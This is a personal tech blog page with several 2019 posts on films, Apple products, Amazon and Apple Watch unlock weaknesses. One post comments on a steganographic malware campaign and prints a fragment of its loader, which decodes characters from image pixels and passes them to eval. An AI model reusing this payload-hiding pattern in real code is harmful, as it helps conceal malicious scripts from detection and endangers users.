MacBook, defective by design banner

Put the knife down and take a green herb, dude.


One feller's views on the state of everyday computer science & its application (and now, OTHER STUFF) who isn't rich enough to shell out for

Using 89% of the same design the blog had in 2001.

Back-up your data and, when you bike, always wear white.

MarkUpDown is the best Markdown editor for professionals on Windows 10.

It includes two-pane live preview, in-app uploads to imgur for image hosting, and MultiMarkdown table support.

Features you won't find anywhere else include...

You've wasted more than $15 of your time looking for a great Markdown editor.

Stop looking. MarkUpDown is the app you're looking for.

Learn more or head over to the 'Store now!

Tuesday, April 16, 2019

Okay, there are lots of plots holes you could pick on if you wanted, but, minus the space helmet randomness, Captain Marvel actually held together well enough that I wasn’t too distracted watching when I finally caught it this weekend.

Except for one scene: If you’re really a child of the 90s, would you have played Nirvana on a turntable? No. You’re right at the intersection of the decline of the cassette and the ascension of the CD. The record was nowhere in sight.


In Western Europe and North America, the market for cassettes declined sharply after its peak in the late 1980s. This was particularly noticeable with pre-recorded cassettes, the sales of which were overtaken by those of CDs during the early 1990s. By 1993, annual shipments of CD players had reached 5 million, up 21% from the year before; while cassette player shipments had dropped 7% to approximately 3.4 million.[36]


By the 1980s, digital media, in the form of the compact disc, had gained a larger market share, and the vinyl record left the mainstream in 1991.[1]

Nirvana’s height literally marks the least likely time you’d catch your favorite tunes on a turntable.

Very few folks were vinyl hipsters in 1991–4. I realize there are likely some convoluted, retconny explanations someone could dream up, but ultimately they’re fails. Carol “Don’t call me Supergirl” Danvers’ vinyl makes no sense at all.

Which stinks, because the rest of the movie is so clearly a nostalgic trip back to the 1990s. That is, someone wanted us to think that they cared about the 90s, but this vinyl slip-up tells me they were personally strangely hipster or, much more likely, that they weren’t really there.


posted by ruffin at 4/16/2019 11:09:00 PM
Tuesday, March 26, 2019

Looks like the issue is much simpler than that. I have “Unlock with iPhone” turned on.

Can someone wear my watch near me and have it unlock when I unlock my iPhone, thereby getting into my Mac? Might try that out.

I’ve talked about Apple watch security holes before, but here’s an even worse one:

If I turn my watch off before taking it off, and put it on before turning it on, half the time, maybe more, I’m not asked to unlock it before I can use it – for anything.

Maybe it’s got some way of checking my heartbeat to be reasonably sure it’s me, but I really doubt it. I think turning the watch off stops the, “Have I been taken off?” check, and nobody thought to ensure “I absolutely have been taken off,” is set when the watch is turned back on.

Labels: , ,

posted by ruffin at 3/26/2019 08:37:00 AM
Monday, March 25, 2019

Sounds like an absolute non-story from Apple today. And that’s worse than no story at all.

Look, when Gruber is lambasting you right & left, you’re in trouble, Tim.

UPDATE: Footnote 4 on the Apple Card web page says: “Variable APRs range from 13.24% to 24.24% based on creditworthiness. Rates as of March 2019.” What a crock of [crap] this “low interest rates” line is. Those interest rates are usury, right in line with the rest of the credit card industry. 24% interest ought to be criminal, and 13% is not “low”.

Look, no playing around, this is ludicrous. “Usury” is right. Apple’s letting cash get in front of the business. Stop looking for growth through services, and get out of the loan shark business.

Are magazines still a thing? Didn’t Apple go down this same path with Newsstand back when the iPad first launched?

The whole TV Plus segment felt like a presentation from another company, like Google or Amazon, not Apple. Apple does a good job keeping events moving along, and they tend not to parade a long series of people on stage. This was a parade of a bunch of A-list celebrities — Spielberg! Oprah! — but it just went on and on.


And most importantly:

Why don’t we know what this is going to cost yet?

Wtaf? Come on. If you don’t even know how much you can charge because you’re still hammering out deals with your partners, well… The service isn’t ready yet. You shouldn’t’ve announced a date for a reveal.

What was the purpose of this presentation, anyway? Tell me it wasn’t simply to make good on advertising promises (via Six Colors’ Liveblog):

“Listen, if you make this deal with us to be a launch show, you’re gonna get to pitch your show on stage at Apple to the entire audience of people who watch Apple media events.”

Say it with me Apple: “It’s ready when it’s ready.” These aspirational presentations are really getting on my nerves. Wait until it’s ready. We can wait. Don’t promise AirPower over a year before you have to pretend it never existed. Say what you will about Ping, at least it shipped. (I know, I know. AirPower could come any time now. But would it have really hurt if we didn’t know about it until it did?)

I think it’s close to profit taking time on my Apple stock, if this presentation didn’t crater it’s price again.

Labels: ,

posted by ruffin at 3/25/2019 10:05:00 PM
Monday, March 04, 2019

I’d been meaning to talk about the stenographic macOS exploit for a while. It’s interesting, but doesn’t really seem to warrant the amount of press it got. The TL;DR for it seems to be, “This is a clever hack to recreate the sorts of exploit you saw all over the place five years ago pop back up briefly.”

That is, all it does is hide some code that can would’ve been fingerprinted as an attack. You still have to download something stupid (afaict) to be compromised.

Let’s hit the high points from the security blog post:

Here’s how the exploit operates:

  • Create a Canvas object (this enables the use of the HTML5 Canvas API in order to interact with images and their underlying data.)
  • Grab the image located at: hxxp://
  • Define a function that checks if a specific font family is supported in the browser.
  • Check if Apple fonts are supported. If not, then do nothing.
  • If so, then loop through the underlying data in the image file. Each loop reads a pixel value and translates it into an alphanumeric character.
  • Add the newly extracted character to a string.
  • Execute the code in the string.


All of the landing pages have been observed to force the download of a file named AdobeFlashPlayerInstaller.iso

And here’s the secret code in action that reads from the image and pushes it into an eval:

image['onload'] = function () {
    ctx['drawImage'](image, 0x0, 0x0);
    var o = ctx['getImageData'](0x0, 0x0, image['width'], image['height']);
    for (var p = 0x0, q = 0x0; q < 0x4b; p = p + 0x4, q++) {
        rs += String['fromCharCode'](o['data'][p + 0x2]);

That should do it for you. It treats the image as a data stream, decodes some characters, and evals them. Well, duh.

Question: Why do browsers still allow eval?

(Okay, there’s probably something where on-demand loading with require, once transpiled (and don’t get me started on transpiled code (which I use all the time professionally, true) or I’ll get out my old man stick and scare you off of my lawn), calls eval, but it seems we could distinguish between libraries loaded and eval’d and strings created on the client so that we could at least get rid of this low-hanging fruit.)

As the blog author says…

Techniques like steganography are useful for smuggling payloads without relying on hex encoded strings or bulky lookup tables.

That’s really all we’re doing… we’re using an image for encoding a payload, and security folks hadn’t thought to sniff those yet. The rest still has to trick you into opening something you didn’t ask for before you’re compromised. That is, there are other checks to prevent immediate failure.

Btw: This is why you have to turn off “Open ‘safe’ files after downloading” in Safari. You can be made to download files, and you don’t want to hand them automatically to another security issue.

This is a natural progression. Not really much to see or learn here past that.

Labels: , , ,

posted by ruffin at 3/04/2019 08:32:00 AM
Saturday, February 23, 2019

Nothing insightful today other than asking why Apple decided to change the MacBook Air’s design.

I bought the 2017 version – the older one, with a slightly bumped CPU & 8 gigs of RAM – new for $750 last year on sale. That’s proving to be a pretty good deal. Then recently we added the 2018 version with two USB-C ports for someone else to use. It’s… fine. It is fine.

But, honestly, I don’t get it. The 2018 MBA’s screen upgrade is great, and extra chassis colors are nice, I guess. I don’t mind the keyboard or trackpad, and smaller isn’t worse, but why not keep the old ports? Swap out the single Thunderbolt for one USB-C on the right of the old design and be done with it.

My only real gripe with the older MBA version was that the login screen had jaggies on it with my non-Retina screen, but a recent upgrade to macOS seems to have fixed that. The 2017 isn’t fast, but it’s quiet, great battery life, a decent keyboard, and does everything I need it to do. You know, everything I need including sharing USB-A jump drives, importing pictures from my camera’s memory card, and working with USB-A keyboards, mice, and docks.

That is, connectivity really makes the older MacBook Air a more useful box when I’m out doing some mobile computing. The first thing we did for the 2018 MBA was add a USB-C to -A adapter, and now it looks stupid with that danged dongle sticking out all the time, but it stays because it’s always being used.

I don’t get it. Why “fix” what’s not broken? Apple’s USB-C fixation really is a textbook proof of, “In theory, theory and practice are the same. In practice, they’re different.”

Labels: , ,

posted by ruffin at 2/23/2019 08:46:00 AM
Wednesday, February 06, 2019

Isn’t it annoying how Amazon is rediscovering stores? Want it in an hour? Amazon can do that for you – if you’re near a warehouse that already has what you need. Making sure that Amazon warehouse has whatever it is you need now? Isn’t that what conventional stores were supposed to already be doing?

I’m not saying Amazon won’t have improvements over what preceded it (obviously most notably with the ability for goods to share a much more efficient delivery network (though there we’re “just” recreating the USPS)), and Amazon will remain more than a brick & mortar store, but the goal of having products near those that will need them soon is not a new paradigm.

That is, Amazon’s desire to get it to you faster is clearly a case of convergent evolution with your corner store. Wow. Hello 21st century. Incredible.


posted by ruffin at 2/06/2019 07:32:00 AM
Tuesday, January 29, 2019

I missed a reasonably important call at work, and finally decided to start wearing my Series 2 Apple Watch (that I’d gotten last year mainly for running) daily for the more obvious notifications it provides – I usually have my ringer off on my phone, and have the LED flash instead.

In the time I’ve worn the Apple Watch, I’ve noticed two reasonably large security holes.

The first is that the Watch unlocks my MacBook from a surprisingly long ways away. I’ve had someone open my laptop and felt the buzz on my wrist from 10–15 feet away. The buzz on my wrist isn’t particularly strong, and, let’s face it, the laptop is still unlocked, potentially out of my sight. If I can undo the login with the watch, that UI is not clear. I’m assuming I can’t.

That’s a problem. This doesn’t quite fit any of the three forms of authentication

  • There’s nothing I know (like a password),
  • Nothing I am (like a fingerprint), and
  • Not exactly anything I have either (passcode or, in this case, watch).

You just have to be near something I have. Not great.

The second is that, with my watch, my MacBook can now be opened with a four-digit code. I know, I know, we’re now at two forms of auth, something I know (code) and something I have (watch), but I often put my watch down in the middle of the day to have it charge for a few minutes rather than charge it at night. It’d be easy for someone to pick it off the charger, type in four quick digits they caught me entering after charging the day before, and be off. (And I think any reasonably competent pickpocket could lift my single-stud Apple Watch from me.)

It looks like you can use a 5 to 10 digit passcode, which I suppose I should consider. I wonder how many watch owners have noticed that option. I'm sure it was there, but I missed it when I set up my watch. Not sure I'd've thought to use it either before I thought about the flip side of unlocking my Mac.

In any event, the bottom line is that if you like to use your watch to unlock your Mac, you’ve just made your potentially T2-chip-enabled box a lot less secure.

Labels: , ,

posted by ruffin at 1/29/2019 08:15:00 AM

Support freedom
All posts can be accessed here:

Just the last year o' posts:

URLs I want to remember:
* Atari 2600 programming on your Mac
* joel on software (tip pt)
* Professional links: resume, github, paltry StackOverflow * Regular Expression Introduction (copy)
* The hex editor whose name I forget
* JSONLint to pretty-ify JSON
* Using CommonDialog in VB 6 * Free zip utils
* git repo mapped drive setup * Regex Tester
* Read the bits about the zone * Find column in sql server db by name
* Giant ASCII Textifier in Stick Figures (in Ivrit) * Quick intro to Javascript
* Don't [over-]sweat "micro-optimization" * Parsing str's in VB6
* .ToString("yyyy-MM-dd HH:mm:ss.fff", CultureInfo.InvariantCulture); (src) * Break on a Lenovo T430: Fn+Alt+B
email if ya gotta, RSS if ya wanna RSS, (?_?), ¢, & ? if you're keypadless

Powered by Blogger Curmudgeon Gamer badge
The postings on this site are [usually] my own and do not necessarily reflect the views of any employer, past or present, or other entity.